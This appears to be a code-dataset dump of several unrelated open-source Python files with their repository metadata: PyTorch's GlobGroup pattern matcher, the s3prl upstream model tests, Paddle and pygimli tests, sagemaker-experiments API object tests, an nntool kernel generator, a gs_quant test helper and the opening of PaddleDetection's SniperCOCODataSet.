client.get("/test")
request = call.call_args[0][1]
# for Django >= 2.2 we apply a HttpHeaders instance to .headers
assert isinstance(request.headers, mock.Mock) != has_headers
class ClientTestSchema(Schema):
time: datetime
def test_schema_as_data():
schema_instance = ClientTestSchema(time=timezone.now().replace(microsecond=0))
with mock.patch.object(client, "_call") as call:
client.post("/test", json=schema_instance)
request = call.call_args[0][1]
assert (
ClientTestSchema.model_validate_json(request.body).model_dump_json()
== schema_instance.model_dump_json()
)
def test_json_as_body():
schema_instance = ClientTestSchema(time=timezone.now().replace(microsecond=0))
with mock.patch.object(client, "_call") as call:
client.post(
"/test",
data=schema_instance.model_dump_json(),
content_type="application/json",
)
request = call.call_args[0][1]
assert (
ClientTestSchema.model_validate_json(request.body).model_dump_json()
== schema_instance.model_dump_json()
)
|
43a3b771d6a8fdbb18b275e0ef6604e333ce7878
|
afd2087e80478010d9df66e78280f75e1ff17d45
|
/torch/package/glob_group.py
|
a8434788d016fd64cb03e1cf5cdebea5d65d6a59
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-secret-labs-2011",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] |
permissive
|
pytorch/pytorch
|
7521ac50c47d18b916ae47a6592c4646c2cb69b5
|
a6f7dd4707ac116c0f5fb5f44f42429f38d23ab4
|
refs/heads/main
| 2023-08-03T05:05:02.822937
| 2023-08-03T00:40:33
| 2023-08-03T04:14:52
| 65,600,975
| 77,092
| 24,610
|
NOASSERTION
| 2023-09-14T21:58:39
| 2016-08-13T05:26:41
|
Python
|
UTF-8
|
Python
| false
| false
| 3,610
|
py
|
glob_group.py
|
import re
from typing import Iterable, Union
GlobPattern = Union[str, Iterable[str]]
class GlobGroup:
"""A set of patterns that candidate strings will be matched against.
A candidate is composed of a list of segments separated by ``separator``, e.g. "foo.bar.baz".
A pattern contains one or more segments. Segments can be:
- A literal string (e.g. "foo"), which matches exactly.
- A string containing a wildcard (e.g. "torch*", or "foo*baz*"). The wildcard matches
any string, including the empty string.
- A double wildcard ("**"). This matches against zero or more complete segments.
Examples:
``torch.**``: matches ``torch`` and all its submodules, e.g. ``torch.nn`` and ``torch.nn.functional``.
``torch.*``: matches ``torch.nn`` or ``torch.functional``, but not ``torch.nn.functional``.
``torch*.**``: matches ``torch``, ``torchvision``, and all their submodules.
    A candidate will match the ``GlobGroup`` if it matches any of the ``include`` patterns and
    none of the ``exclude`` patterns.
Args:
include (Union[str, Iterable[str]]): A string or list of strings,
each representing a pattern to be matched against. A candidate
            will match if it matches *any* include pattern.
exclude (Union[str, Iterable[str]]): A string or list of strings,
each representing a pattern to be matched against. A candidate
will be excluded from matching if it matches *any* exclude pattern.
separator (str): A string that delimits segments in candidates and
patterns. By default this is "." which corresponds to how modules are
named in Python. Another common value for this is "/", which is
the Unix path separator.
"""
def __init__(
self, include: GlobPattern, *, exclude: GlobPattern = (), separator: str = "."
):
self._dbg = f"GlobGroup(include={include}, exclude={exclude})"
self.include = GlobGroup._glob_list(include, separator)
self.exclude = GlobGroup._glob_list(exclude, separator)
self.separator = separator
def __str__(self):
return self._dbg
def __repr__(self):
return self._dbg
def matches(self, candidate: str) -> bool:
candidate = self.separator + candidate
return any(p.fullmatch(candidate) for p in self.include) and all(
not p.fullmatch(candidate) for p in self.exclude
)
@staticmethod
def _glob_list(elems: GlobPattern, separator: str = "."):
if isinstance(elems, str):
return [GlobGroup._glob_to_re(elems, separator)]
else:
return [GlobGroup._glob_to_re(e, separator) for e in elems]
@staticmethod
def _glob_to_re(pattern: str, separator: str = "."):
# to avoid corner cases for the first component, we prefix the candidate string
# with '.' so `import torch` will regex against `.torch`, assuming '.' is the separator
def component_to_re(component):
if "**" in component:
if component == "**":
return "(" + re.escape(separator) + "[^" + separator + "]+)*"
else:
raise ValueError("** can only appear as an entire path segment")
else:
return re.escape(separator) + ("[^" + separator + "]*").join(
re.escape(x) for x in component.split("*")
)
result = "".join(component_to_re(c) for c in pattern.split(separator))
return re.compile(result)
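# A small usage sketch of the pattern semantics documented above, guarded so
# it only runs when this module is executed directly:
if __name__ == "__main__":
    group = GlobGroup("torch.**", exclude="torch.nn.functional")
    assert group.matches("torch")                     # '**' also matches zero segments
    assert group.matches("torch.nn")
    assert not group.matches("torch.nn.functional")   # explicitly excluded
    assert not group.matches("torchvision")           # 'torch.**' requires the 'torch' segment exactly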
|
d5671d0dfcedf4374b84f3fd20221ac04bda7107
|
cadb6dceb7bb67ce47ef48b2c83f480a65d6b01a
|
/test/test_upstream.py
|
2027cdda7256d44695d1e0c8bc3a269ca26c2b71
|
[
"Apache-2.0",
"CC-BY-NC-4.0"
] |
permissive
|
s3prl/s3prl
|
52ec2ae4df5a61c786c122085603aa9c5e8c2681
|
76a9432b824f6ae3eae09a35a67782c4ed582832
|
refs/heads/main
| 2023-08-17T02:26:57.524087
| 2023-06-10T17:12:27
| 2023-06-10T17:12:27
| 196,905,457
| 1,549
| 398
|
Apache-2.0
| 2023-09-14T13:07:05
| 2019-07-15T01:54:52
|
Python
|
UTF-8
|
Python
| false
| false
| 9,302
|
py
|
test_upstream.py
|
import logging
import os
import shutil
import tempfile
import traceback
from pathlib import Path
from subprocess import check_call
import pytest
import torch
from filelock import FileLock
from s3prl.nn import Featurizer, S3PRLUpstream
from s3prl.util.download import _urls_to_filepaths
from s3prl.util.pseudo_data import get_pseudo_wavs
logger = logging.getLogger(__name__)
TEST_MORE_ITER = 2
TRAIN_MORE_ITER = 5
SAMPLE_RATE = 16000
ATOL = 0.01
MAX_LENGTH_DIFF = 3
EXTRA_SHORT_SEC = 0.001
EXTRACTED_GT_DIR = Path(__file__).parent.parent / "sample_hidden_states"
# Expect the following directory structure:
#
# -- s3prl/ (repository root)
# ---- s3prl/ (package root)
# ---- test/
# ------- test_upstream.py
# ---- sample_hidden_states/
def _prepare_sample_hidden_states():
lock_file = Path(__file__).parent.parent / "sample_hidden_states.lock"
with FileLock(str(lock_file)):
# NOTE: home variable is necessary for git lfs to work
env = dict(os.environ)
if not "HOME" in env:
env["HOME"] = Path.home()
if not EXTRACTED_GT_DIR.is_dir():
with tempfile.TemporaryDirectory() as tempdir:
tempdir = Path(tempdir)
tempdir.mkdir(exist_ok=True, parents=True)
logger.info("Downloading extracted sample hidden states...")
check_call("git lfs install".split(), cwd=tempdir, env=env)
check_call(
"git clone https://huggingface.co/datasets/s3prl/sample_hidden_states".split(),
cwd=tempdir,
env=env,
)
shutil.move(
str(tempdir / "sample_hidden_states"), str(EXTRACTED_GT_DIR.parent)
)
else:
logger.info(f"{EXTRACTED_GT_DIR} exists. Perform git pull...")
check_call("git pull".split(), cwd=EXTRACTED_GT_DIR, env=env)
try:
lock_file.unlink()
except FileNotFoundError:
pass
def _extract_feat(
model: S3PRLUpstream,
seed: int = 0,
**pseudo_wavs_args,
):
wavs, wavs_len = get_pseudo_wavs(seed=seed, padded=True, **pseudo_wavs_args)
all_hs, all_lens = model(wavs, wavs_len)
return all_hs
def _all_hidden_states_same(hs1, hs2):
for h1, h2 in zip(hs1, hs2):
if h1.size(1) != h2.size(1):
length_diff = abs(h1.size(1) - h2.size(1))
assert length_diff <= MAX_LENGTH_DIFF, f"{length_diff} > {MAX_LENGTH_DIFF}"
min_seqlen = min(h1.size(1), h2.size(1))
h1 = h1[:, :min_seqlen, :]
h2 = h2[:, :min_seqlen, :]
assert torch.allclose(h1, h2, atol=ATOL)
def _load_ground_truth(name: str):
source = f"{EXTRACTED_GT_DIR}/{name}.pt"
if source.startswith("http"):
path = _urls_to_filepaths(source)
else:
path = source
return torch.load(path)
def _compare_with_extracted(name: str):
model = S3PRLUpstream(name)
model.eval()
with torch.no_grad():
hs = _extract_feat(model)
hs_gt = _load_ground_truth(name)
_all_hidden_states_same(hs, hs_gt)
for i in range(TEST_MORE_ITER):
more_hs = _extract_feat(model)
for h1, h2 in zip(hs, more_hs):
assert torch.allclose(
h1, h2
), "should have deterministic representation in eval mode"
for i in range(TEST_MORE_ITER):
more_hs = _extract_feat(model, seed=i + 1)
assert len(hs) == len(
more_hs
), "should have deterministic num_layer in eval mode"
model.train()
for i in range(TRAIN_MORE_ITER):
more_hs = _extract_feat(model, seed=i + 1)
assert len(hs) == len(
more_hs
), "should have deterministic num_layer in train mode"
def _test_forward_backward(name: str, **pseudo_wavs_args):
"""
Test the upstream with the name: 'name' can successfully forward and backward
"""
with torch.autograd.set_detect_anomaly(True):
model = S3PRLUpstream(name)
hs = _extract_feat(model, **pseudo_wavs_args)
h_sum = 0
for h in hs:
h_sum = h_sum + h.sum()
h_sum.backward()
def _filter_options(options: list):
    options = [
        name
        for name in options
        if (name != "customized_upstream")
        and (
            "mos" not in name
        )  # mos models do not have hidden_states key. They only return a single mos score
        and (
            "stft_mag" not in name
        )  # stft_mag upstream must pass the config file currently and is not so important. So, skip the test now
        and (
            "pase" not in name
        )  # pase_plus needs lots of dependencies and is difficult to be tested and is not very worthy today
        and (
            name != "xls_r_1b"
        )  # skip due to too large model, too long download time
        and (
            name != "xls_r_2b"
        )  # skip due to too large model, too long download time
        and (
            name not in ["ast", "ssast_patch_base", "ssast_frame_base"]
        )  # FIXME: remove timm dependency
        and (name != "vggish")  # FIXME: remove resampy dependency
        and (name != "byol_s_cvt")  # FIXME: remove einops dependency
        and ("lighthubert" not in name)  # FIXME: solve the random subnet issue
        and (name != "passt_hop160base2lvl")  # too huge memory usage
        and (name != "passt_hop160base2lvlmel")  # too huge memory usage
        and (name != "passt_hop100base2lvl")  # too huge memory usage
        and (name != "passt_hop100base2lvlmel")  # too huge memory usage
    ]
options = [option for option in options if "passt" in option]
return options
"""
Test cases ensure that all upstreams are working and are same with pre-extracted features
"""
@pytest.mark.upstream
@pytest.mark.parametrize(
"name",
[
"wav2vec2",
"wavlm",
"hubert",
],
)
def test_common_upstream(name):
_prepare_sample_hidden_states()
_compare_with_extracted(name)
_test_forward_backward(
name, min_secs=EXTRA_SHORT_SEC, max_secs=EXTRA_SHORT_SEC, n=1
)
_test_forward_backward(
name, min_secs=EXTRA_SHORT_SEC, max_secs=EXTRA_SHORT_SEC, n=2
)
_test_forward_backward(name, min_secs=EXTRA_SHORT_SEC, max_secs=1, n=3)
@pytest.mark.upstream
@pytest.mark.slow
def test_upstream_with_extracted(upstream_names: str):
_prepare_sample_hidden_states()
if upstream_names is not None:
options = upstream_names.split(",")
else:
options = S3PRLUpstream.available_names(only_registered_ckpt=True)
options = _filter_options(options)
options = sorted(options)
tracebacks = []
for name in options:
logger.info(f"Testing upstream: '{name}'")
try:
_compare_with_extracted(name)
        except Exception:
            tb = traceback.format_exc()
            logger.error(f"{name}\n{tb}")
            tracebacks.append((name, tb))
if len(tracebacks) > 0:
for name, tb in tracebacks:
logger.error(f"Error in {name}:\n{tb}")
logger.error(f"All failed models:\n{[name for name, _ in tracebacks]}")
assert False
@pytest.mark.upstream
@pytest.mark.slow
def test_upstream_forward_backward(upstream_names: str):
if upstream_names is not None:
options = upstream_names.split(",")
else:
options = S3PRLUpstream.available_names(only_registered_ckpt=True)
options = _filter_options(options)
options = sorted(options)
options = reversed(options)
tracebacks = []
for name in options:
logger.info(f"Testing upstream: '{name}'")
try:
_test_forward_backward(name)
        except Exception:
            tb = traceback.format_exc()
            logger.error(f"{name}\n{tb}")
            tracebacks.append((name, tb))
if len(tracebacks) > 0:
for name, tb in tracebacks:
logger.error(f"Error in {name}:\n{tb}")
logger.error(f"All failed models:\n{[name for name, _ in tracebacks]}")
assert False
@pytest.mark.upstream
@pytest.mark.parametrize("layer_selections", [None, [0, 4, 9]])
@pytest.mark.parametrize("normalize", [False, True])
def test_featurizer(layer_selections, normalize):
model = S3PRLUpstream("hubert")
featurizer = Featurizer(
model, layer_selections=layer_selections, normalize=normalize
)
wavs, wavs_len = get_pseudo_wavs(padded=True)
all_hs, all_lens = model(wavs, wavs_len)
hs, hs_len = featurizer(all_hs, all_lens)
assert isinstance(hs, torch.FloatTensor)
assert isinstance(hs_len, torch.LongTensor)
@pytest.mark.upstream
def test_upstream_properties():
model = S3PRLUpstream("hubert")
featurizer = Featurizer(model)
assert isinstance(model.hidden_sizes, (tuple, list)) and isinstance(
model.hidden_sizes[0], int
)
assert isinstance(model.downsample_rates, (tuple, list)) and isinstance(
model.downsample_rates[0], int
)
assert isinstance(featurizer.output_size, int)
assert isinstance(featurizer.downsample_rate, int)
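# A minimal end-to-end sketch of the API exercised by these tests, guarded so
# it only runs when this file is executed directly (it assumes the 'hubert'
# checkpoint is cached locally or can be downloaded):
if __name__ == "__main__":
    model = S3PRLUpstream("hubert").eval()
    featurizer = Featurizer(model)
    wavs = torch.randn(2, SAMPLE_RATE)                       # two 1-second waveforms
    wavs_len = torch.LongTensor([SAMPLE_RATE, SAMPLE_RATE])
    with torch.no_grad():
        all_hs, all_lens = model(wavs, wavs_len)             # one hidden state per layer
        hs, hs_len = featurizer(all_hs, all_lens)            # weighted sum into one tensor
    print(hs.shape, featurizer.output_size, featurizer.downsample_rate)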
|
e528b06cf1dcf05276a6f54627d9c60ea8af80f5
|
974d04d2ea27b1bba1c01015a98112d2afb78fe5
|
/test/collective/collective_global_scatter_dygraph.py
|
2e5001371fd47bdd926bc7638f082c9f8be7fe49
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/Paddle
|
b3d2583119082c8e4b74331dacc4d39ed4d7cff0
|
22a11a60e0e3d10a3cf610077a3d9942a6f964cb
|
refs/heads/develop
| 2023-08-17T21:27:30.568889
| 2023-08-17T12:38:22
| 2023-08-17T12:38:22
| 65,711,522
| 20,414
| 5,891
|
Apache-2.0
| 2023-09-14T19:20:51
| 2016-08-15T06:59:08
|
C++
|
UTF-8
|
Python
| false
| false
| 2,410
|
py
|
collective_global_scatter_dygraph.py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import numpy as np
from legacy_test.test_collective_api_base import (
TestCollectiveAPIRunnerBase,
runtime_main,
)
import paddle
from paddle import fluid
from paddle.distributed.utils import moe_utils
class TestCollectiveGlobalScatterAPI(TestCollectiveAPIRunnerBase):
def __init__(self):
self.global_ring_id = 0
def get_model(self, main_prog, startup_program, rank, indata=None):
with fluid.program_guard(main_prog, startup_program):
seed = os.getpid()
np.random.seed(seed)
in_feat = 2
n_expert = 2
world_size = 2
tot_expert = n_expert * world_size
            # each rank draws a random token count for every (rank, expert) pair
            local_expert_count = np.random.randint(
                1, 4, size=tot_expert
            ).astype("int")
fwd_expert_count = sum(local_expert_count)
local_input_buf = np.random.rand(fwd_expert_count, in_feat).astype(
"float32"
)
local_expert_count = paddle.to_tensor(local_expert_count)
local_input_buf = paddle.to_tensor(local_input_buf)
            # exchange per-expert token counts across ranks with all-to-all
            global_expert_count = []
            paddle.distributed.alltoall(
                paddle.split(local_expert_count, 2, axis=0), global_expert_count
            )
global_expert_count = paddle.concat(global_expert_count, axis=0)
local_input_buf.stop_gradient = False
output = moe_utils.global_scatter(
local_input_buf, local_expert_count, global_expert_count
)
output.stop_gradient = False
c = output * output
c.backward()
return [output.numpy(False), local_input_buf.grad.numpy(False)]
if __name__ == "__main__":
runtime_main(TestCollectiveGlobalScatterAPI, "global_scatter")
|
8b8ebc78fecfe4775361b1d05d17ca840aed6bd2
|
543365e4c2f58970e7ad5a3c06dd23d20e0d134d
|
/pygimli/testing/test_Frameworks.py
|
ad39bfbc54a42750dc32ade97e56f9c6e8d4259e
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
gimli-org/gimli
|
152b5f1563e994385f7594a43482d467ee3cb9e7
|
0f55444b624f390a674053f62ba1a05506deafa6
|
refs/heads/master
| 2023-09-03T22:52:18.366328
| 2023-08-28T09:05:13
| 2023-08-28T09:05:13
| 12,602,199
| 307
| 125
|
NOASSERTION
| 2023-07-02T14:59:16
| 2013-09-04T21:10:47
|
C++
|
UTF-8
|
Python
| false
| false
| 1,740
|
py
|
test_Frameworks.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# write a correct test!
import unittest
import pygimli as pg
import numpy as np
class TestFrameworks(unittest.TestCase):
def test_Fit(self):
"""
"""
func = lambda x, a, b, c: a + b * x + c * x**2
x = np.linspace(0, 1, 11)
model = [1.5, 2, 2.5]
data = func(x, *model)
mEst, response = pg.frameworks.fit(func, data, x=x)
np.testing.assert_allclose(mEst, model)
np.testing.assert_allclose(data, response)
model = [0.5, -1.0, 0.0]
data = func(x, *model) #+ pg.randn(len(x))*0.001
mEst, response = pg.frameworks.fit(func, data, x=x)
# np.testing.assert_allclose(mEst, model, atol=1e-7)
# np.testing.assert_allclose(data, response)
# pg.plt.plot(x, data)
# pg.plt.plot(x, response, 'x')
print(model)
data[5] = 1e-17
#np.testing.assert_allclose(data2, data, atol=1e-15)
mEst, response = pg.frameworks.fit(func, data, x=x)
# np.testing.assert_allclose(mEst, model, atol=1e-8)
# np.testing.assert_allclose(data, response)
# pg.plt.plot(x, response, 'o')
# print(mEst)
# pg.wait()
func = lambda t, a, b: a*np.exp(b*t)
t = np.linspace(1, 2, 100)
data = func(t, 1.1, 2.2)
model, response = pg.frameworks.fit(func, data, t=t)
# pg.plt.plot(t, data, '.', label='data')
# pg.plt.plot(t, response, label='response')
# pg.wait()
np.testing.assert_allclose(model, [1.1, 2.2])
np.testing.assert_allclose(data, response)
if __name__ == '__main__':
#test = TestFrameworks()
#test.test_Fit()
unittest.main()
|
f9c70ff3509f1df70e30614d55811f9accc6c849
|
477b705bcf007707454a701f174103ba5292d0b4
|
/tests/unit/test_base_types.py
|
00cd808973ea2701d5a535e2ffe8a9799aa6f8ab
|
[
"Apache-2.0"
] |
permissive
|
aws/sagemaker-experiments
|
357baeca25fa869545604cbb11d41f3afe3ddc29
|
815bf0c8111d06115040d839f6f1f57831c16bc6
|
refs/heads/main
| 2023-08-15T10:34:58.407886
| 2023-05-17T14:59:01
| 2023-05-17T15:58:34
| 215,120,058
| 110
| 34
|
Apache-2.0
| 2023-05-17T15:58:36
| 2019-10-14T18:43:20
|
Python
|
UTF-8
|
Python
| false
| false
| 5,442
|
py
|
test_base_types.py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import pytest
import unittest.mock
from smexperiments import _base_types
@pytest.fixture
def sagemaker_boto_client():
return unittest.mock.Mock()
def test_from_boto():
obj = _base_types.ApiObject.from_boto(dict(A=10))
assert obj.a == 10
def test_to_boto():
assert dict(A=10) == _base_types.ApiObject.to_boto({"a": 10})
def test_custom_type():
class TestTypeA(_base_types.ApiObject):
pass
    class TestTypeB(_base_types.ApiObject):
        # maps attribute name -> (ApiObject subclass, whether it is a collection)
        _custom_boto_types = {"test_type_a_value": (TestTypeA, False)}
obj = TestTypeB.from_boto(dict(TestTypeAValue=dict(SomeValue=10)))
assert obj.test_type_a_value == TestTypeA(some_value=10)
obj2 = TestTypeB(test_type_a_value=TestTypeA(some_value=10))
assert TestTypeB.to_boto(vars(obj2)) == dict(TestTypeAValue=dict(SomeValue=10))
def test_custom_type_list():
class TestTypeA(_base_types.ApiObject):
pass
class TestTypeB(_base_types.ApiObject):
_custom_boto_types = {"test_type_a_value": (TestTypeA, True)}
obj = TestTypeB.from_boto(dict(TestTypeAValue=[dict(SomeValue=10), dict(SomeValue=11)]))
assert obj.test_type_a_value == [TestTypeA(some_value=10), TestTypeA(some_value=11)]
assert dict(TestTypeAValue=[dict(SomeValue=10), dict(SomeValue=11)]) == TestTypeB.to_boto(vars(obj))
class DummyRecordSummary(_base_types.ApiObject):
pass
class DummyRecord(_base_types.Record):
_boto_create_method = "create"
_boto_update_method = "update"
_boto_delete_method = "delete"
_boto_update_members = ["a"]
_boto_delete_members = ["a", "b"]
def update(self):
"""Placeholder docstring"""
return self._invoke_api(self._boto_update_method, self._boto_update_members)
def delete(self):
"""Placeholder docstring"""
self._invoke_api(self._boto_delete_method, self._boto_delete_members)
def test_custom_type_dict():
class TestTypeA(_base_types.ApiObject):
pass
class TestTypeB(_base_types.ApiObject):
_custom_boto_types = {"test_type_a_value": (TestTypeA, True)}
obj = TestTypeB.from_boto(dict(TestTypeAValue={"key_1": dict(SomeValue=10), "key_2": dict(SomeValue=11)}))
assert obj.test_type_a_value == {
"key_1": TestTypeA(some_value=10),
"key_2": TestTypeA(some_value=11),
}
assert dict(TestTypeAValue={"key_1": dict(SomeValue=10), "key_2": dict(SomeValue=11)}) == TestTypeB.to_boto(
vars(obj)
)
def test_construct(sagemaker_boto_client):
sagemaker_boto_client.create.return_value = dict(C=20)
record = DummyRecord._construct(DummyRecord._boto_create_method, sagemaker_boto_client, a=10, b=10)
assert record.a == 10
assert record.b == 10
assert record.c == 20
def test_update(sagemaker_boto_client):
sagemaker_boto_client.update.return_value = {}
record = DummyRecord(sagemaker_boto_client, a=10, b=10)
record.update()
sagemaker_boto_client.update.assert_called_with(A=10)
def test_delete(sagemaker_boto_client):
sagemaker_boto_client.delete.return_value = {}
record = DummyRecord(sagemaker_boto_client, a=10, b=10)
record.delete()
sagemaker_boto_client.delete.assert_called_with(A=10, B=10)
def test_list_empty(sagemaker_boto_client):
sagemaker_boto_client.list.return_value = {"TestRecordSummaries": []}
assert [] == list(
DummyRecord._list(
"list",
DummyRecordSummary.from_boto,
"TestRecordSummaries",
sagemaker_boto_client=sagemaker_boto_client,
)
)
def test_list_with_items(sagemaker_boto_client):
sagemaker_boto_client.list.return_value = {"TestRecordSummaries": [{"Foo": "bar"}]}
assert [DummyRecordSummary(foo="bar")] == list(
DummyRecord._list(
"list",
DummyRecordSummary.from_boto,
"TestRecordSummaries",
sagemaker_boto_client=sagemaker_boto_client,
)
)
def test_list_with_next_token(sagemaker_boto_client):
sagemaker_boto_client.list.side_effect = [
{"TestRecordSummaries": [{"A": 1}, {"A": 2}], "NextToken": "a"},
{"TestRecordSummaries": [{"A": 3}, {"A": 4}], "NextToken": None},
]
assert [DummyRecordSummary(a=i) for i in range(1, 5)] == list(
DummyRecord._list(
"list",
DummyRecordSummary.from_boto,
"TestRecordSummaries",
sagemaker_boto_client=sagemaker_boto_client,
)
)
@unittest.mock.patch("smexperiments._base_types._utils.sagemaker_client")
def test_list_no_client(mocked_utils_sagemaker_client, sagemaker_boto_client):
mocked_utils_sagemaker_client.return_value = sagemaker_boto_client
sagemaker_boto_client.list.side_effect = []
list(DummyRecord._list("list", DummyRecordSummary.from_boto, "TestRecordSummaries"))
assert _base_types._utils.sagemaker_client.called
|
d97fe6084db141b21d7814d233a75505c3845ccb
|
c6759b857e55991fea3ef0b465dbcee53fa38714
|
/tools/nntool/nntool/generation/generators/general/expressions.py
|
4561ca0df2616713c2981247aaeb5275cbe82704
|
[
"AGPL-3.0-or-later",
"AGPL-3.0-only",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"Apache-2.0"
] |
permissive
|
GreenWaves-Technologies/gap_sdk
|
1b343bba97b7a5ce62a24162bd72eef5cc67e269
|
3fea306d52ee33f923f2423c5a75d9eb1c07e904
|
refs/heads/master
| 2023-09-01T14:38:34.270427
| 2023-08-10T09:04:44
| 2023-08-10T09:04:44
| 133,324,605
| 145
| 96
|
Apache-2.0
| 2023-08-27T19:03:52
| 2018-05-14T07:50:29
|
C
|
UTF-8
|
Python
| false
| false
| 2,258
|
py
|
expressions.py
|
# Copyright (C) 2020 GreenWaves Technologies, SAS
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import logging
from nntool.generation.generators.general.autotiler_kernel import NewAutoTilerKernel
from nntool.generation.generators.generator_base import GeneratorBase, paramstype
from nntool.generation.generators.helpers.in_out_bindings_mixin import \
InOutBindingsMixin
from nntool.graph.types import ExpressionFusionNode
LOG = logging.getLogger(__name__)
@paramstype(ExpressionFusionNode)
class GenExpressionParameters(GeneratorBase, InOutBindingsMixin):
@classmethod
def globals_generator(cls, gen, node, qrec, pnode, fnode) -> bool:
return True
@classmethod
def bindings_generator(cls, gen, node, qrec, in_eparams, out_eparams, cname) -> bool:
cls.set_multi_in_out_bindings(
gen, in_eparams, out_eparams, cname, node, qrec)
return True
@classmethod
def kernel_generator(cls, gen, node, qrec, in_eparams, out_eparams, cname) -> bool:
del in_eparams, out_eparams
func_name, _ = gen.expressions_get_names(node)
gen_name = f'{func_name}_gen'
gen.kernels.append(ExpressionKernel(cname, node, qrec, gen_name))
return True
class ExpressionKernel(NewAutoTilerKernel):
CALL_TEMPLATE = '''
// generator for {node_name}
{gen_name}("{cname}");
'''
def __init__(self, cname, params, qrec, gen_name):
attrs = {
'gen_name': gen_name
}
# other attributes
extra_attrs = {
'cname': cname,
'node_name': params.name
}
        super().__init__(attrs, extra_attrs)
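# --- Illustrative sketch, not part of the original generator ---
# NewAutoTilerKernel is assumed to render CALL_TEMPLATE by substituting the
# attribute dicts passed to __init__; a minimal stand-in of that step:
def _render_call_sketch(template, attrs, extra_attrs):
    """Fill the AutoTiler call template with kernel attributes."""
    return template.format(**attrs, **extra_attrs)
# Example with hypothetical names:
# _render_call_sketch(ExpressionKernel.CALL_TEMPLATE,
#                     {'gen_name': 'expr_fn_gen'},
#                     {'cname': 'S4_Expr', 'node_name': 'expr_0'})
# produces '// generator for expr_0' followed by 'expr_fn_gen("S4_Expr");'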
|
002d61d9a517a60c5a3d3c40bcbc862f4f59b6aa
|
0841643267b9fc1478f6e3d21bfccb17aba67af6
|
/gs_quant/test/utils/datagrid_test_utils.py
|
5afb5db96e8838bbe3bb179e8750011ae5e63781
|
[
"Apache-2.0"
] |
permissive
|
goldmansachs/gs-quant
|
55618e0e4e961d4ee50b7393f27c258e2647a957
|
4cf8ec75c4d85b16ec08371c46cc1a9ede9d72a2
|
refs/heads/master
| 2023-08-20T00:55:43.324547
| 2023-08-16T16:55:22
| 2023-08-16T16:55:22
| 161,840,815
| 2,088
| 596
|
Apache-2.0
| 2023-08-16T16:55:23
| 2018-12-14T21:10:40
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,056
|
py
|
datagrid_test_utils.py
|
"""
Copyright 2019 Goldman Sachs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
import json
import pathlib
from gs_quant.markets.securities import Stock
from gs_quant.target.common import Currency
def _read_entity(entity):
    with open(pathlib.Path(__file__).parents[1] / f'resources/{entity}.json') as entity_file:
        return json.loads(entity_file.read())
def get_test_entity(entity_id: str):
entity = _read_entity(entity_id)
return Stock(id_=entity_id,
name=entity['name'],
currency=Currency.USD,
entity=entity)
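# --- Illustrative usage, not part of the original helpers ---
# Assuming resources/<entity_id>.json exists with at least a "name" field,
# a test would typically do the following (the id below is made up):
# stock = get_test_entity("MAEXAMPLE123")
# assert stock.currency == Currency.USD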
|
2b8782aac602ecd7304e385db02bf5f0d8e74407
|
bf8d344b17e2ff9b7e38ad9597d5ce0e3d4da062
|
/ppdet/data/source/sniper_coco.py
|
1b07e7a31d999d137965c4860a4d8085d0b91465
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/PaddleDetection
|
e7e0f40bef75a4e0b6dcbacfafa7eb1969e44961
|
bd83b98342b0a6bc8d8dcd5936233aeda1e32167
|
refs/heads/release/2.6
| 2023-08-31T07:04:15.357051
| 2023-08-18T02:24:45
| 2023-08-18T02:24:45
| 217,475,193
| 12,523
| 3,096
|
Apache-2.0
| 2023-09-10T10:05:56
| 2019-10-25T07:21:14
|
Python
|
UTF-8
|
Python
| false
| false
| 6,837
|
py
|
sniper_coco.py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import cv2
import json
import copy
import numpy as np
try:
from collections.abc import Sequence
except Exception:
from collections import Sequence
from ppdet.core.workspace import register, serializable
from ppdet.data.crop_utils.annotation_cropper import AnnoCropper
from .coco import COCODataSet
from .dataset import _make_dataset, _is_valid_file
from ppdet.utils.logger import setup_logger
logger = setup_logger('sniper_coco_dataset')
@register
@serializable
class SniperCOCODataSet(COCODataSet):
"""SniperCOCODataSet"""
def __init__(self,
dataset_dir=None,
